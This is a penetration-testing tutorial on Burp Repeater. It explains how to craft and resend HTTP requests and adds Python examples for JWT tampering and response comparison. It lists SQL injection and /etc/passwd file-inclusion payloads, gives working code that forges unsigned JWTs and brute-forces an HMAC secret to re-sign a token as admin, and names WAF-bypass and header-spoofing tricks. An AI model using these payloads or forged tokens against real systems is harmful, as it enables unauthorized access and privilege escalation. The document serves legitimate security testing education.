While automated scanners are fast, Burp Repeater remains the weapon of choice for fine-grained analysis.
It lets you inspect, craft, and reissue requests in isolation — ideal for identifying edge-case vulnerabilities.
This article focuses on how to effectively use Repeater for manual payload analysis during a web penetration test.
1. What is Repeater?
Burp Repeater is a tool that lets you manually modify and resend HTTP requests to a target server.
Each request/response pair is preserved, enabling precise observation of changes in behavior.
Perfect for:
- Parameter tampering
- Authentication bypass testing
- Input validation exploration
- Verifying scanner findings (separating true positives from false positives)
2. Sending Requests to Repeater
From Proxy → HTTP history or Target → Site map, right-click a request and choose "Send to Repeater".
Alternatively, use the keyboard shortcut Ctrl+R (Windows/Linux) or Cmd+R (macOS).
Each Repeater tab is independent and keeps its own request history, so you can step back through earlier versions of a request and see exactly what changed between attempts.
3. Constructing & Testing Payloads
Consider a GET request with a q parameter:
GET /search?q=test HTTP/1.1
Host: app.example.com
Now try replacing the value of q with, for example:
- SQLi: q=' OR '1'='1
- XSS: q=
- LFI: q=../../../../etc/passwd
Characters such as quotes, spaces and slashes must be URL-encoded in the query string; select the payload in Repeater and press Ctrl+U to encode it, and always send the unmodified baseline (q=test) first so you have something to compare against.
Observe the differences in:
- HTTP status code
- Response body structure
- Error messages
- Response time (for time-based payloads)
4. Binary and Encoded Payloads
Use Repeater + Decoder together:
- Base64 / URL-encoded payloads
- JSON body manipulation
- JWT tampering
Example (JWT):
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6...
Paste the first segment into Decoder: it is a header declaring alg HS256. Two classic checks follow. Change alg to none and strip the signature (keep the trailing dot so the token still has three segments) to see whether the server accepts an unsigned token, or brute-force the HMAC secret offline against the real signature and re-sign a modified payload. In both cases confirm that a changed claim actually takes effect in the response; a 200 on its own proves nothing.
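As an added worked example (not code from the original article, and not a Burp feature), the same two attacks performed outside Burp in Python with only the standard library, so the resulting token can be pasted after "Bearer " in Repeater. The token, the weak secret "secret" and the wordlist are constructed for the demonstration; the encoding is standard JWS, which is why the forged header's first segment matches the eyJhbGciOiJIUzI1NiIs... prefix shown above.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example: a weak HMAC secret and a short wordlist.
SAMPLE_SECRET = b"secret"
WORDLIST = ["password", "changeme", "letmein", "secret", "jwtsecret"]


def b64url_encode(raw: bytes) -> str:
    """Base64url without padding, as JWS requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(seg: str) -> bytes:
    """Re-add the padding JWS strips, then decode."""
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def compact_json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def split_jwt(token: str):
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return parts


def decode_jwt(token: str):
    """Return (header, claims) without verifying anything (Decoder's view)."""
    h, p, _ = split_jwt(token)
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(header: dict, claims: dict, secret: bytes) -> str:
    h, p = b64url_encode(compact_json(header)), b64url_encode(compact_json(claims))
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def forge_alg_none(token: str, **new_claims) -> str:
    """alg=none tampering: rewrite the header, change claims, drop the signature
    but keep the trailing dot so the token still has three segments."""
    header, claims = decode_jwt(token)
    header["alg"] = "none"
    claims.update(new_claims)
    return f"{b64url_encode(compact_json(header))}.{b64url_encode(compact_json(claims))}."


def brute_force_hs256(token: str, candidates):
    """Offline dictionary attack on the HMAC secret; returns the secret or None."""
    h, p, s = split_jwt(token)
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for cand in candidates:
        mac = hmac.new(cand.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return cand
    return None


def verify_hs256(token: str, secret: bytes, allowed_algs=("HS256",)):
    """How a hardened verifier behaves: algorithm allow-list first, then a
    constant-time signature check. Returns the claims or None."""
    h, p, s = split_jwt(token)
    header = json.loads(b64url_decode(h))
    if header.get("alg") not in allowed_algs:
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


# Constructed token, as it would appear after "Bearer " in the Authorization header.
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"sub": "1001", "role": "user"}, SAMPLE_SECRET)

if __name__ == "__main__":
    print("alg=none forgery:", forge_alg_none(SAMPLE_TOKEN, role="admin"))
    recovered = brute_force_hs256(SAMPLE_TOKEN, WORDLIST)
    print("recovered secret:", recovered)
    if recovered:
        print("re-signed as admin:", sign_hs256({"alg": "HS256", "typ": "JWT"},
              {"sub": "1001", "role": "admin"}, recovered.encode()))
```

The alg=none forgery only succeeds when the server's JWT library honours the header's algorithm; verify_hs256 shows the check a hardened verifier performs (an explicit algorithm allow-list before any signature comparison), which is exactly why a tampered token has to be confirmed against the application's behaviour in Repeater rather than assumed to work.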
5. Comparing Responses
Send two responses to Comparer (right-click → Send to Comparer (response)) and diff them by words or by bytes:
- Highlight differences in HTML output
- Identify subtle changes in headers (e.g. Set-Cookie, Location, Content-Length)
Useful for bypass attempts, privilege escalation detection, and race condition exploration.
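The observations listed in sections 3 and 5 (status code, headers such as Set-Cookie, Location and Content-Length, and body changes) can also be automated on responses copied out of Repeater's response pane. The following is an added example in Python, not code from the article or from Burp; the baseline response for q=test and the response to the SQLi payload are constructed for the demonstration.

```python
import difflib

# Constructed sample responses (not captured from any real host): the baseline
# for q=test and the response to q=' OR '1'='1 on the article's search endpoint.
BASELINE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 68\r\n"
    "Set-Cookie: session=abc123; HttpOnly\r\n"
    "\r\n"
    "<html><body><h1>Results for: test</h1><p>3 results</p></body></html>"
)
CANDIDATE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 107\r\n"
    "\r\n"
    "<html><body><h1>Error</h1><p>You have an error in your SQL syntax near "
    "''1'='1' at line 1</p></body></html>"
)

# Headers whose change usually means the payload altered server-side state or routing.
WATCHED_HEADERS = ("set-cookie", "location", "content-length", "content-type",
                   "www-authenticate")


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response (as shown in Repeater's response pane) into
    (status_code, headers, body). Headers are a list of (name, value) with the
    name lower-cased, so repeated headers such as Set-Cookie are all kept."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate responses pasted with bare LF line endings
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def header_values(headers, name):
    return [v for n, v in headers if n == name]


def compare_responses(baseline_raw: str, candidate_raw: str, watched=WATCHED_HEADERS):
    """Diff two responses the way you would eyeball them in Comparer: status code,
    watched headers, body length and the changed body lines."""
    b_status, b_headers, b_body = parse_response(baseline_raw)
    c_status, c_headers, c_body = parse_response(candidate_raw)
    report = {
        "status": (b_status, c_status),
        "status_changed": b_status != c_status,
        "length_delta": len(c_body) - len(b_body),
        "header_changes": {},
        "body_diff": [],
    }
    for name in watched:
        before, after = header_values(b_headers, name), header_values(c_headers, name)
        if before != after:
            report["header_changes"][name] = (before, after)
    # n=0 keeps only changed lines; the "---"/"+++" file-name lines are dropped.
    for line in difflib.unified_diff(b_body.splitlines(), c_body.splitlines(),
                                     "baseline", "candidate", lineterm="", n=0):
        if line.startswith(("+", "-")) and not line.startswith(("+++", "---")):
            report["body_diff"].append(line)
    return report


def summarize(report) -> list:
    """Human-readable findings list; empty when the two responses look the same."""
    notes = []
    if report["status_changed"]:
        notes.append("status %d -> %d" % report["status"])
    for name, (before, after) in report["header_changes"].items():
        notes.append("%s: %r -> %r" % (name, before, after))
    if report["length_delta"]:
        notes.append("body length delta %+d" % report["length_delta"])
    return notes


if __name__ == "__main__":
    r = compare_responses(BASELINE, CANDIDATE)
    for note in summarize(r):
        print(note)
    for line in r["body_diff"]:
        print(line)
```

On the constructed pair the report flags the 200 to 500 change, the missing Set-Cookie (the error path never issued a session), the Content-Length change and the SQL error text in the body diff; the same structure works for a privilege-escalation check, where the interesting signal is usually a Location or Set-Cookie difference rather than the body.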
6. Advanced Repeater Use Cases
- Bypass WAFs with encoding obfuscation
- Custom header injection (X-Original-URL to reach paths a front end blocks, X-Forwarded-For to spoof the client address)
- CSRF token replay with static/dynamic values
- State manipulation using intercepted cookies
Combine with Burp's Cookie Jar and Session Handling Rules so fresh cookies and tokens are applied automatically across attempts.
Final Notes
Burp Repeater is not just a testing tool — it’s an observation instrument.
Mastering it trains your eye to spot what scanners miss: authorization and business-logic flaws, subtle misconfigurations, and behaviour that only appears in edge cases.
Coming up:
- Burp Intruder for fuzzing inputs at scale
- Practical bypass techniques for input filters
- Building custom payload libraries for targeted testing
Precision matters. Test with intent. Interpret with clarity.